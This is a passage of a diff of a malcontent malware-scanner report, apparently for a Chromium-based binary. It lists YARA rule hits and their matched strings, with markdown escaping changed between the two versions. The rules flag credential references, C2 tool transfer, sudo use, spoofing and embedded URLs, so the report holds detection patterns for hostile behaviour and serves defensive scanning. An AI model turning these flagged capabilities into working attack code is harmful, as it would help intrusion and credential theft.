`$opt39`
`$opt40`
`$opt41`
`$opt42`
`$opt43`
`$opt44`
`$opt45`
`$opt46`
`$opt47`
`$opt48`
`$opt49`
`$opt50`
`$opt51`
`$opt52`
`$opt53`
`$opt54`
`$opt55`
`$opt56`
`$opt57`
`$opt58`
`$opt59`
`$opt60`
`$opt61`
`$opt62`
`$opt63`
`$opt0`
`$opt7`
`$opt8`
`$opt9`
['&%$](https://github.com/search?q=%27%26%25%24&type=code)
[+*\)\(](https://github.com/search?q=%2B%2A%29%28&type=code)
[/.-,](https://github.com/search?q=%2F.-%2C&type=code)
[3210](https://github.com/search?q=3210&type=code)
[7654](https://github.com/search?q=7654&type=code)
[;:98](https://github.com/search?q=%3B%3A98&type=code)
[?>=<](https://github.com/search?q=%3F%3E%3D%3C&type=code)
[CBA@](https://github.com/search?q=CBA%40&type=code)
[GFED](https://github.com/search?q=GFED&type=code)
[KJIH](https://github.com/search?q=KJIH&type=code)
[ONML](https://github.com/search?q=ONML&type=code)
[SRQP](https://github.com/search?q=SRQP&type=code)
[WVUT](https://github.com/search?q=WVUT&type=code)
[\[ZYX](https://github.com/search?q=%5BZYX&type=code)
[_^\]\](https://github.com/search?q=_%5E%5D%5C&type=code)
[cba\`](https://github.com/search?q=cba%60&type=code)
[gfed](https://github.com/search?q=gfed&type=code)
[kjih](https://github.com/search?q=kjih&type=code)
[onml](https://github.com/search?q=onml&type=code)
[srqp](https://github.com/search?q=srqp&type=code)
[wvut](https://github.com/search?q=wvut&type=code)
[{zyx](https://github.com/search?q=%7Bzyx&type=code)
[#"!](https://github.com/search?q=%23%22%21&type=code) | | MEDIUM | [crypto/uuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/uuid.yara#random_uuid) | generates a random UUID | [randomUUID](https://github.com/search?q=randomUUID&type=code) | | MEDIUM | [data/embedded/base64_terms](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-terms.yara#contains_base64) | Contains base64 CERTIFICATE | [contains_base64::DRVJUSUZJQ0FUR](https://github.com/search?q=contains_base64%3A%3ADRVJUSUZJQ0FUR&type=code)
[contains_base64::Q0VSVElGSUNBVE](https://github.com/search?q=contains_base64%3A%3AQ0VSVElGSUNBVE&type=code)
[contains_base64::ZGlyZWN0b3J5](https://github.com/search?q=contains_base64%3A%3AZGlyZWN0b3J5&type=code)
[contains_base64::RpcmVjdG9ye](https://github.com/search?q=contains_base64%3A%3ARpcmVjdG9ye&type=code) | | MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [contains_base64_url::odHRwczovL](https://github.com/search?q=contains_base64_url%3A%3AodHRwczovL&type=code)
[contains_base64_url::aHR0cDovL](https://github.com/search?q=contains_base64_url%3A%3AaHR0cDovL&type=code)
[contains_base64_url::odHRwOi8v](https://github.com/search?q=contains_base64_url%3A%3AodHRwOi8v&type=code)
[contains_base64_url::h0dHA6Ly](https://github.com/search?q=contains_base64_url%3A%3Ah0dHA6Ly&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code)
[[](https://github.com/search?q=%3Chtml%3E&type=code) | -| MEDIUM | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt_Math) | performs math directly against parsed integers | [- parseInt(](https://github.com/search?q=-+parseInt%28&type=code) | -| MEDIUM | [data/encoding/utf16](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/utf16.yara#chr) | assembles strings from UTF-16 code units | [(String.fromCharCode(i + 32)](https://github.com/search?q=%28String.fromCharCode%28i+%2B+32%29&type=code)
[(String.fromCharCode(parseIn](https://github.com/search?q=%28String.fromCharCode%28parseIn&type=code)
[=String.fromCharCode(127&e[i](https://github.com/search?q=%3DString.fromCharCode%28127%26e%5Bi&type=code)
[=String.fromCharCode(e[i]);r](https://github.com/search?q=%3DString.fromCharCode%28e%5Bi%5D%29%3Br&type=code)
[=String.fromCharCode(n[e]+25](https://github.com/search?q=%3DString.fromCharCode%28n%5Be%5D%2B25&type=code)
[=String.fromCharCode.apply(S](https://github.com/search?q=%3DString.fromCharCode.apply%28S&type=code)
[=String.fromCharCode;functio](https://github.com/search?q=%3DString.fromCharCode%3Bfunctio&type=code)
[tring" "fromCharCode" has in](https://github.com/search?q=tring%22+%22fromCharCode%22+has+in&type=code)
[tring" "fromCharCodeArray" h](https://github.com/search?q=tring%22+%22fromCharCodeArray%22+h&type=code)
[String.fromCharCode.apply(n](https://github.com/search?q=String.fromCharCode.apply%28n&type=code)
[(String.fromCharCode(code)](https://github.com/search?q=%28String.fromCharCode%28code%29&type=code)
[(String.fromCharCode(i))](https://github.com/search?q=%28String.fromCharCode%28i%29%29&type=code)
`$ref` | +| MEDIUM | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt_Math) | performs math directly against parsed integers | [- parseInt\(](https://github.com/search?q=-+parseInt%28&type=code) | +| MEDIUM | [data/encoding/utf16](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/utf16.yara#chr) | assembles strings from UTF-16 code units | [\(String.fromCharCode\(i + 32\)](https://github.com/search?q=%28String.fromCharCode%28i+%2B+32%29&type=code)
[\(String.fromCharCode\(parseIn](https://github.com/search?q=%28String.fromCharCode%28parseIn&type=code)
[=String.fromCharCode\(127&e\[i](https://github.com/search?q=%3DString.fromCharCode%28127%26e%5Bi&type=code)
[=String.fromCharCode\(e\[i\]\);r](https://github.com/search?q=%3DString.fromCharCode%28e%5Bi%5D%29%3Br&type=code)
[=String.fromCharCode\(n\[e\]+25](https://github.com/search?q=%3DString.fromCharCode%28n%5Be%5D%2B25&type=code)
[=String.fromCharCode.apply\(S](https://github.com/search?q=%3DString.fromCharCode.apply%28S&type=code)
[=String.fromCharCode;functio](https://github.com/search?q=%3DString.fromCharCode%3Bfunctio&type=code)
[tring" "fromCharCode" has in](https://github.com/search?q=tring%22+%22fromCharCode%22+has+in&type=code)
[tring" "fromCharCodeArray" h](https://github.com/search?q=tring%22+%22fromCharCodeArray%22+h&type=code)
[String.fromCharCode.apply\(n](https://github.com/search?q=String.fromCharCode.apply%28n&type=code)
[\(String.fromCharCode\(code\)](https://github.com/search?q=%28String.fromCharCode%28code%29&type=code)
[\(String.fromCharCode\(i\)\)](https://github.com/search?q=%28String.fromCharCode%28i%29%29&type=code)
`$ref` | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [networkInterfaces](https://github.com/search?q=networkInterfaces&type=code)
[freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [macAddress](https://github.com/search?q=macAddress&type=code) | | MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | @@ -74,7 +74,7 @@ | MEDIUM | [net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload) | upload content via HTTP form | [application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[POST](https://github.com/search?q=POST&type=code)
[post](https://github.com/search?q=post&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits form content to websites | [Content-Type: application/octet](https://github.com/search?q=Content-Type%3A+application%2Foctet&type=code)
[Content-Type: multipart/related](https://github.com/search?q=Content-Type%3A+multipart%2Frelated&type=code)
[Content-Type: application/json](https://github.com/search?q=Content-Type%3A+application%2Fjson&type=code)
[Content-Type was not one of](https://github.com/search?q=Content-Type+was+not+one+of&type=code)
[Content-Type: text/plain](https://github.com/search?q=Content-Type%3A+text%2Fplain&type=code)
[Content-Type: text/html](https://github.com/search?q=Content-Type%3A+text%2Fhtml&type=code)
[Content-Type too large](https://github.com/search?q=Content-Type+too+large&type=code)
[Content-Type header.](https://github.com/search?q=Content-Type+header.&type=code)
[Content-Typeding](https://github.com/search?q=Content-Typeding&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WebSocketMessageChunkAccumulator::Segment](https://github.com/search?q=WebSocketMessageChunkAccumulator%3A%3ASegment&type=code)
[WebSocketStream::Delegate::OnAuthRequired](https://github.com/search?q=WebSocketStream%3A%3ADelegate%3A%3AOnAuthRequired&type=code)
[258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[webSocketHandshakeResponseReceived](https://github.com/search?q=webSocketHandshakeResponseReceived&type=code)
[WebSocketReceiveHandshakeResponse](https://github.com/search?q=WebSocketReceiveHandshakeResponse&type=code)
[webSocketWillSendHandshakeRequest](https://github.com/search?q=webSocketWillSendHandshakeRequest&type=code)
[WebSocketAuthenticationHandler](https://github.com/search?q=WebSocketAuthenticationHandler&type=code)
[WebSocketSendHandshakeRequest](https://github.com/search?q=WebSocketSendHandshakeRequest&type=code)
[WebSocket::GetBufferedAmount](https://github.com/search?q=WebSocket%3A%3AGetBufferedAmount&type=code)
[establishWebSocketConnection](https://github.com/search?q=establishWebSocketConnection&type=code)
[WebSocket::GetCloseWasClean](https://github.com/search?q=WebSocket%3A%3AGetCloseWasClean&type=code)
[WebSocket::GetCloseReason](https://github.com/search?q=WebSocket%3A%3AGetCloseReason&type=code)
[WebSocket::ReceiveMessage](https://github.com/search?q=WebSocket%3A%3AReceiveMessage&type=code)
[WebSocket::GetExtensions](https://github.com/search?q=WebSocket%3A%3AGetExtensions&type=code)
[WebSocket::GetReadyState](https://github.com/search?q=WebSocket%3A%3AGetReadyState&type=code)
[WebSocketHandshakeClient](https://github.com/search?q=WebSocketHandshakeClient&type=code)
[ServerSupportsWebSocket](https://github.com/search?q=ServerSupportsWebSocket&type=code)
[WebSocket::GetCloseCode](https://github.com/search?q=WebSocket%3A%3AGetCloseCode&type=code)
[EnclaveWebSocketClient](https://github.com/search?q=EnclaveWebSocketClient&type=code)
[WebSocket::GetProtocol](https://github.com/search?q=WebSocket%3A%3AGetProtocol&type=code)
[WebSocket::IsWebSocket](https://github.com/search?q=WebSocket%3A%3AIsWebSocket&type=code)
[WebSocket::SendMessage](https://github.com/search?q=WebSocket%3A%3ASendMessage&type=code)
[WebSocketStreamOptions](https://github.com/search?q=WebSocketStreamOptions&type=code)
[webSocketFrameReceived](https://github.com/search?q=webSocketFrameReceived&type=code)
[WebSocketChannelImpl](https://github.com/search?q=WebSocketChannelImpl&type=code)
[webSocketDebuggerUrl](https://github.com/search?q=webSocketDebuggerUrl&type=code)
[webSocketFrameError](https://github.com/search?q=webSocketFrameError&type=code)
[OnWebSocketMessage](https://github.com/search?q=OnWebSocketMessage&type=code)
[OnWebSocketRequest](https://github.com/search?q=OnWebSocketRequest&type=code)
[WebSocket::Connect](https://github.com/search?q=WebSocket%3A%3AConnect&type=code)
[WebSocketCloseInfo](https://github.com/search?q=WebSocketCloseInfo&type=code)
[WebSocketConnector](https://github.com/search?q=WebSocketConnector&type=code)
[webSocketFrameSent](https://github.com/search?q=webSocketFrameSent&type=code)
[WebSocket::Create](https://github.com/search?q=WebSocket%3A%3ACreate&type=code)
[WebSocket::GetURL](https://github.com/search?q=WebSocket%3A%3AGetURL&type=code)
[WebSocketSendData](https://github.com/search?q=WebSocketSendData&type=code)
[testWebSocketPort](https://github.com/search?q=testWebSocketPort&type=code)
[webSocketProtocol](https://github.com/search?q=webSocketProtocol&type=code)
[WebSocket::Close](https://github.com/search?q=WebSocket%3A%3AClose&type=code)
[WebSocketAdapter](https://github.com/search?q=WebSocketAdapter&type=code)
[WebSocketDestroy](https://github.com/search?q=WebSocketDestroy&type=code)
[WebSocketHTTPURL](https://github.com/search?q=WebSocketHTTPURL&type=code)
[webSocketCreated](https://github.com/search?q=webSocketCreated&type=code)
[AcceptWebSocket](https://github.com/search?q=AcceptWebSocket&type=code)
[WebSocketCreate](https://github.com/search?q=WebSocketCreate&type=code)
[WebSocketSticky](https://github.com/search?q=WebSocketSticky&type=code)
[webSocketClosed](https://github.com/search?q=webSocketClosed&type=code)
[WebSocketError](https://github.com/search?q=WebSocketError&type=code)
[kWebSocketURL:](https://github.com/search?q=kWebSocketURL%3A&type=code)
[WebSocketInit](https://github.com/search?q=WebSocketInit&type=code)
[DOMWebSocket](https://github.com/search?q=DOMWebSocket&type=code)
[WebSockets](https://github.com/search?q=WebSockets&type=code)
[wss://](https://github.com/search?q=wss%3A%2F%2F&type=code) | -| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | [host, protocol, port](https://github.com/search?q=host%2C+protocol%2C+port&type=code)
[hostname=null,e.port](https://github.com/search?q=hostname%3Dnull%2Ce.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+++origin_port&type=code)
[host: address, port](https://github.com/search?q=host%3A+address%2C+port&type=code)
[host=null,this.port](https://github.com/search?q=host%3Dnull%2Cthis.port&type=code)
[host,r.port=e.port](https://github.com/search?q=host%2Cr.port%3De.port&type=code)
[host.length - port](https://github.com/search?q=host.length+-+port&type=code)
[hostname && A.port](https://github.com/search?q=hostname+%26%26+A.port&type=code)
[hostname="",r.port](https://github.com/search?q=hostname%3D%22%22%2Cr.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+origin_port&type=code)
[hostname}:${port](https://github.com/search?q=hostname%7D%3A%24%7Bport&type=code)
[hostname}${port](https://github.com/search?q=hostname%7D%24%7Bport&type=code)
[hostname, port](https://github.com/search?q=hostname%2C+port&type=code)
[host and port](https://github.com/search?q=host+and+port&type=code)
[host",t.port](https://github.com/search?q=host%22%2Ct.port&type=code)
[host}:${port](https://github.com/search?q=host%7D%3A%24%7Bport&type=code)
[host>:[host_import](https://github.com/search?q=host_import&type=code)
[host}${port](https://github.com/search?q=host%7D%24%7Bport&type=code)
`$host_port`
[host, port](https://github.com/search?q=host%2C+port&type=code)
[host:]port](https://github.com/search?q=host%3A%5Dport&type=code)
[host/port](https://github.com/search?q=host%2Fport&type=code)
[host:port](https://github.com/search?q=host%3Aport&type=code) | +| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | [host, protocol, port](https://github.com/search?q=host%2C+protocol%2C+port&type=code)
[hostname=null,e.port](https://github.com/search?q=hostname%3Dnull%2Ce.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+++origin_port&type=code)
[host: address, port](https://github.com/search?q=host%3A+address%2C+port&type=code)
[host=null,this.port](https://github.com/search?q=host%3Dnull%2Cthis.port&type=code)
[host,r.port=e.port](https://github.com/search?q=host%2Cr.port%3De.port&type=code)
[host.length - port](https://github.com/search?q=host.length+-+port&type=code)
[hostname && A.port](https://github.com/search?q=hostname+%26%26+A.port&type=code)
[hostname="",r.port](https://github.com/search?q=hostname%3D%22%22%2Cr.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+origin_port&type=code)
[hostname}:${port](https://github.com/search?q=hostname%7D%3A%24%7Bport&type=code)
[hostname}${port](https://github.com/search?q=hostname%7D%24%7Bport&type=code)
[hostname, port](https://github.com/search?q=hostname%2C+port&type=code)
[host and port](https://github.com/search?q=host+and+port&type=code)
[host",t.port](https://github.com/search?q=host%22%2Ct.port&type=code)
[host}:${port](https://github.com/search?q=host%7D%3A%24%7Bport&type=code)
[host>:[host_import](https://github.com/search?q=host_import&type=code)
[host}${port](https://github.com/search?q=host%7D%24%7Bport&type=code)
`$host_port`
[host, port](https://github.com/search?q=host%2C+port&type=code)
[host:\]port](https://github.com/search?q=host%3A%5Dport&type=code)
[host/port](https://github.com/search?q=host%2Fport&type=code)
[host:port](https://github.com/search?q=host%3Aport&type=code) | | MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping with high retransmit count:](https://github.com/search?q=ping+with+high+retransmit+count%3A&type=code)
[ping most likely connection to](https://github.com/search?q=ping+most+likely+connection+to&type=code)
[ping payload must be 8 bytes](https://github.com/search?q=ping+payload+must+be+8+bytes&type=code)
[ping was sent and the ack](https://github.com/search?q=ping+was+sent+and+the+ack&type=code)
[ping connectivity probe](https://github.com/search?q=ping+connectivity+probe&type=code)
[ping from zygote child](https://github.com/search?q=ping+from+zygote+child&type=code)
[ping last_ping_sent_:](https://github.com/search?q=ping+last_ping_sent_%3A&type=code)
[ping failures and](https://github.com/search?q=ping+failures+and&type=code)
[ping interval to](https://github.com/search?q=ping+interval+to&type=code)
[ping cancelled](https://github.com/search?q=ping+cancelled&type=code)
[ping interval.](https://github.com/search?q=ping+interval.&type=code)
[ping received](https://github.com/search?q=ping+received&type=code)
[ping response](https://github.com/search?q=ping+response&type=code)
[ping libuv](https://github.com/search?q=ping+libuv&type=code)
[ping err](https://github.com/search?q=ping++err&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | | MEDIUM | [net/ip/spoof](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/spoof.yara#spoof) | references spoofing | [of hostname spoofing](https://github.com/search?q=of+hostname+spoofing&type=code)
[protocol spoofing](https://github.com/search?q=protocol+spoofing&type=code) | @@ -88,9 +88,9 @@ | MEDIUM | [net/socket/pair](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/pair.yara#socket_pair) | create a pair of connected sockets | [socketpair](https://github.com/search?q=socketpair&type=code) | | MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | | MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Supports SSH (secure shell) | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [-//WcardshillsteamsPhototruthclean.php?saintmetallouismeantproofbriefro](https://github.com/search?q=-%2F%2FWcardshillsteamsPhototruthclean.php%3Fsaintmetallouismeantproofbriefro&type=code)
[http://autocomplete.nigma.ru/complete/query_help.php?suggest=true](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[ofpluginspage/index.php?remained](https://github.com/search?q=ofpluginspage%2Findex.php%3Fremained&type=code)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[examplepersonallyindex.php?](https://github.com/search?q=examplepersonallyindex.php%3F&type=code) | +| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [-//WcardshillsteamsPhototruthclean.php?saintmetallouismeantproofbriefro](https://github.com/search?q=-%2F%2FWcardshillsteamsPhototruthclean.php%3Fsaintmetallouismeantproofbriefro&type=code)
[http://autocomplete.nigma.ru/complete/query_help.php?suggest=true](http%3A%2F%2Fautocomplete.nigma.ru%2Fcomplete%2Fquery_help.php%3Fsuggest%3Dtrue)
[https://search.privacywall.org/suggest.php?q=](https%3A%2F%2Fsearch.privacywall.org%2Fsuggest.php%3Fq%3D)
[http://search.incredibar.com/search.php?q=](http%3A%2F%2Fsearch.incredibar.com%2Fsearch.php%3Fq%3D)
[http://searchfunmoods.com/results.php?q=](http%3A%2F%2Fsearchfunmoods.com%2Fresults.php%3Fq%3D)
[ofpluginspage/index.php?remained](https://github.com/search?q=ofpluginspage%2Findex.php%3Fremained&type=code)
[https://m.so.com/index.php?ie=](https%3A%2F%2Fm.so.com%2Findex.php%3Fie%3D)
[examplepersonallyindex.php?](https://github.com/search?q=examplepersonallyindex.php%3F&type=code) | | MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | -| MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
[request(url,](https://github.com/search?q=request%28url%2C&type=code)
[net/url](https://github.com/search?q=net%2Furl&type=code)
[openURL](https://github.com/search?q=openURL&type=code)
[openUrl](https://github.com/search?q=openUrl&type=code) | +| MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
[request\(url,](https://github.com/search?q=request%28url%2C&type=code)
[net/url](https://github.com/search?q=net%2Furl&type=code)
[openURL](https://github.com/search?q=openURL&type=code)
[openUrl](https://github.com/search?q=openUrl&type=code) | | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) | @@ -99,7 +99,7 @@ | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | | LOW | [anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random) | uses a random number generator | [report_sampling_random_max](https://github.com/search?q=report_sampling_random_max&type=code)
[ConnectRandomPortForHTTPS](https://github.com/search?q=ConnectRandomPortForHTTPS&type=code)
[asyncRefillRandomIntCache](https://github.com/search?q=asyncRefillRandomIntCache&type=code)
[ToggleStateRandomization](https://github.com/search?q=ToggleStateRandomization&type=code)
[cppgc_random_gc_interval](https://github.com/search?q=cppgc_random_gc_interval&type=code)
[http3_grease_randomness](https://github.com/search?q=http3_grease_randomness&type=code)
[random_anchor_sampling](https://github.com/search?q=random_anchor_sampling&type=code)
[treeRandomStatestream](https://github.com/search?q=treeRandomStatestream&type=code)
[RandomAccessFileRead](https://github.com/search?q=RandomAccessFileRead&type=code)
[createRandomPrimeJob](https://github.com/search?q=createRandomPrimeJob&type=code)
[NewRandomAccessFile](https://github.com/search?q=NewRandomAccessFile&type=code)
[cooldown_random_max](https://github.com/search?q=cooldown_random_max&type=code)
[getRandomBytesAlias](https://github.com/search?q=getRandomBytesAlias&type=code)
[random_tree_trainer](https://github.com/search?q=random_tree_trainer&type=code)
[suppress_randomness](https://github.com/search?q=suppress_randomness&type=code)
[CreateRandomString](https://github.com/search?q=CreateRandomString&type=code)
[fuzzer_random_seed](https://github.com/search?q=fuzzer_random_seed&type=code)
[g_random_int_range](https://github.com/search?q=g_random_int_range&type=code)
[suppressRandomness](https://github.com/search?q=suppressRandomness&type=code)
[GenerateRandomKey](https://github.com/search?q=GenerateRandomKey&type=code)
[RandomBytesConfig](https://github.com/search?q=RandomBytesConfig&type=code)
[RandomBytesTraits](https://github.com/search?q=RandomBytesTraits&type=code)
[RandomPrimeConfig](https://github.com/search?q=RandomPrimeConfig&type=code)
[RandomPrimeTraits](https://github.com/search?q=RandomPrimeTraits&type=code)
[compaction_random](https://github.com/search?q=compaction_random&type=code)
[math_random_cache](https://github.com/search?q=math_random_cache&type=code)
[math_random_index](https://github.com/search?q=math_random_index&type=code)
[math_random_state](https://github.com/search?q=math_random_state&type=code)
[pseudoRandomBytes](https://github.com/search?q=pseudoRandomBytes&type=code)
[randomCacheOffset](https://github.com/search?q=randomCacheOffset&type=code)
[_getRandomValues](https://github.com/search?q=_getRandomValues&type=code)
[lazyCryptoRandom](https://github.com/search?q=lazyCryptoRandom&type=code)
[RandomBytesJob](https://github.com/search?q=RandomBytesJob&type=code)
[randomFillSync](https://github.com/search?q=randomFillSync&type=code)
[v8_random_seed](https://github.com/search?q=v8_random_seed&type=code)
[crypto_random](https://github.com/search?q=crypto_random&type=code)
[popLinkRandom](https://github.com/search?q=popLinkRandom&type=code)
[RandomToggle](https://github.com/search?q=RandomToggle&type=code)
[cryptoRandom](https://github.com/search?q=cryptoRandom&type=code)
[pesudorandom](https://github.com/search?q=pesudorandom&type=code)
[pseudorandom](https://github.com/search?q=pseudorandom&type=code)
[ucc128random](https://github.com/search?q=ucc128random&type=code)
[_randomUUID](https://github.com/search?q=_randomUUID&type=code)
[randomBytes](https://github.com/search?q=randomBytes&type=code)
[MathRandom](https://github.com/search?q=MathRandom&type=code)
[random_get](https://github.com/search?q=random_get&type=code)
[randomblob](https://github.com/search?q=randomblob&type=code)
[RandomGet](https://github.com/search?q=RandomGet&type=code)
[getrandom](https://github.com/search?q=getrandom&type=code)
[randomInt](https://github.com/search?q=randomInt&type=code)
[randomize](https://github.com/search?q=randomize&type=code)
[uv_random](https://github.com/search?q=uv_random&type=code)
[random_r](https://github.com/search?q=random_r&type=code)
[randomly](https://github.com/search?q=randomly&type=code)
[randomH](https://github.com/search?q=randomH&type=code)
[urandom](https://github.com/search?q=urandom&type=code) | | LOW | [anti-static/obfuscation/obfuscate](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/obfuscate.yara#obfuscate) | Mentions the word obfuscate | [obfuscate_location_parse_error](https://github.com/search?q=obfuscate_location_parse_error&type=code)
[obfuscated_field_name](https://github.com/search?q=obfuscated_field_name&type=code)
[obfuscated_file_util](https://github.com/search?q=obfuscated_file_util&type=code)
[obfuscated_name](https://github.com/search?q=obfuscated_name&type=code) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[x86_64](https://github.com/search?q=x86_64&type=code)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | | LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Username and password are expected to](https://github.com/search?q=Username+and+password+are+expected+to&type=code)
[accessibilityPasswordValuesEnabled](https://github.com/search?q=accessibilityPasswordValuesEnabled&type=code)
[called on a passwordless request](https://github.com/search?q=called+on+a+passwordless+request&type=code)
[to deserialize password_string](https://github.com/search?q=to+deserialize+password_string&type=code)
[ChromePasswordManagerClient](https://github.com/search?q=ChromePasswordManagerClient&type=code)
[secret_password_clear_sync](https://github.com/search?q=secret_password_clear_sync&type=code)
[secret_password_store_sync](https://github.com/search?q=secret_password_store_sync&type=code)
[or PasswordCredentialData](https://github.com/search?q=or+PasswordCredentialData&type=code)
[Invalid password pattern](https://github.com/search?q=Invalid+password+pattern&type=code)
[PasswordGroupElementData](https://github.com/search?q=PasswordGroupElementData&type=code)
[generated a new password](https://github.com/search?q=generated+a+new+password&type=code)
[AccountPasswordsConsent](https://github.com/search?q=AccountPasswordsConsent&type=code)
[a username and password](https://github.com/search?q=a+username+and+password&type=code)
[PasswordReuseDetected](https://github.com/search?q=PasswordReuseDetected&type=code)
[PasswordSpecificsData](https://github.com/search?q=PasswordSpecificsData&type=code)
[password is too large](https://github.com/search?q=password+is+too+large&type=code)
[password-strong-label](https://github.com/search?q=password-strong-label&type=code)
[GaiaPasswordCaptured](https://github.com/search?q=GaiaPasswordCaptured&type=code)
[username or password](https://github.com/search?q=username+or+password&type=code)
[PasswordReuseLookup](https://github.com/search?q=PasswordReuseLookup&type=code)
[PasswordStrongLabel](https://github.com/search?q=PasswordStrongLabel&type=code)
[getPasswordComplete](https://github.com/search?q=getPasswordComplete&type=code)
[id-PasswordBasedMAC](https://github.com/search?q=id-PasswordBasedMAC&type=code)
